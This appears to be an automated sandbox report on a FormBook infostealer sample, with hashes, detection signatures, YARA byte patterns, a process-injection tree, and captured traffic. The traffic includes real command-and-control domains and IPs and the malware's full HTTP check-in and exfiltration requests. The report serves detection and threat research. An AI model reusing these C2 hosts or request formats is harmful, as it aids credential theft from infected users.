
Windows Analysis Report
BP-50C26_20241220_082241.exe

Overview

General Information

Sample name: BP-50C26_20241220_082241.exe
Analysis ID: 1585941
MD5: 33d01c02e1bb141330aa8be95c21f1bf
SHA1: 2dd0a42aa9c37455d21a1e0baa50c1055a606c89
SHA256: 4f23853d15d1c7ddb80df75d6fa9d59a1b998c17f8585e785da245dfd2022be2
Tags: exe user-cocaman

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • BP-50C26_20241220_082241.exe (PID: 2944 cmdline: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe" MD5: 33D01C02E1BB141330AA8BE95C21F1BF)
    • svchost.exe (PID: 6472 cmdline: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • gaJjobDqjDYWsfRWPZSKY.exe (PID: 3812 cmdline: "C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 4760 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • gaJjobDqjDYWsfRWPZSKY.exe (PID: 3200 cmdline: "C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6568 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", CommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", ParentImage: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe, ParentProcessId: 2944, ParentProcessName: BP-50C26_20241220_082241.exe, ProcessCommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", ProcessId: 6472, ProcessName: svchost.exe
Source: Process started | Author: vburov: Data: Command: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", CommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", ParentImage: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe, ParentProcessId: 2944, ParentProcessName: BP-50C26_20241220_082241.exe, ProcessCommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", ProcessId: 6472, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T14:59:27.901479+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49767 | 154.215.72.110 | 80 | TCP
2025-01-08T15:00:00.101207+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49967 | 116.50.37.244 | 80 | TCP
2025-01-08T15:01:21.693297+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49984 | 85.159.66.93 | 80 | TCP
2025-01-08T15:01:35.281359+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49988 | 91.195.240.94 | 80 | TCP
2025-01-08T15:01:56.879254+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49992 | 66.29.149.46 | 80 | TCP
2025-01-08T15:02:10.386888+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49996 | 195.110.124.133 | 80 | TCP
2025-01-08T15:02:40.141268+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50000 | 217.196.55.202 | 80 | TCP


            AV Detection

Source: BP-50C26_20241220_082241.exe | Avira: detected
Source: http://www.goldenjade-travel.com/fo8o/?Dvh=YnI07v&Ubhdm=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== | Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?Dvh=YnI07v&Ubhdm=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== | Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?Ubhdm=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&Dvh=YnI07v | Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/ | Avira URL Cloud: Label: malware
Source: BP-50C26_20241220_082241.exe | ReversingLabs: Detection: 36%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: BP-50C26_20241220_082241.exe | Joe Sandbox ML: detected
            Source: BP-50C26_20241220_082241.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111344894.000000000093E000.00000002.00000001.01000000.00000004.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4506386913.000000000093E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: BP-50C26_20241220_082241.exe, 00000000.00000003.2038587974.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, BP-50C26_20241220_082241.exe, 00000000.00000003.2041836600.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2093566111.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095219887.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.000000000321E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.0000000003080000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2194533815.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2187698131.0000000002D1A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: BP-50C26_20241220_082241.exe, 00000000.00000003.2038587974.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, BP-50C26_20241220_082241.exe, 00000000.00000003.2041836600.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2093566111.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095219887.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4508062336.000000000321E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.0000000003080000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2194533815.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2187698131.0000000002D1A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2187228592.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156302707.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4506792247.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4506373948.000000000289E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2476352086.0000000035C4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4506373948.000000000289E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2476352086.0000000035C4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2187228592.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156302707.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4506792247.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C4C2A2 FindFirstFileExW,0_2_00C4C2A2
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C868EE FindFirstFileW,FindClose,0_2_00C868EE
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C8698F
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D076
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D3A9
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C89642
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C8979D
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7DBBE
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C89B2B
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C85C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C85C97
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0281BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0281BAB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax 4_2_02809480
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi 4_2_0280DD45
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h 4_2_02DB053E

            Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49767 -> 154.215.72.110:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49967 -> 116.50.37.244:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 91.195.240.94:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 195.110.124.133:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49984 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 217.196.55.202:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 66.29.149.46:80
Source: DNS query: www.joyesi.xyz
Source: Joe Sandbox View | IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View | IP Address: 154.215.72.110 154.215.72.110
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C8CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00C8CE44
            Source: global trafficHTTP traffic detected: GET /fo8o/?Dvh=YnI07v&Ubhdm=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Dvh=YnI07v&Ubhdm=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Dvh=YnI07v&Ubhdm=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ubhdm=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&Dvh=YnI07v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ubhdm=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&Dvh=YnI07v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Dvh=YnI07v&Ubhdm=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic | DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic | DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic | DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic | DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic | DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic | DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic | DNS traffic detected: DNS query: www.techchains.info
Source: global traffic | DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic | DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic | DNS traffic detected: DNS query: www.660danm.top
Source: global traffic | DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic | DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic | DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic | DNS traffic detected: DNS query: www.shenzhoucui.com
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 206Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 55 62 68 64 6d 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d Data Ascii: Ubhdm=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 13:59:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 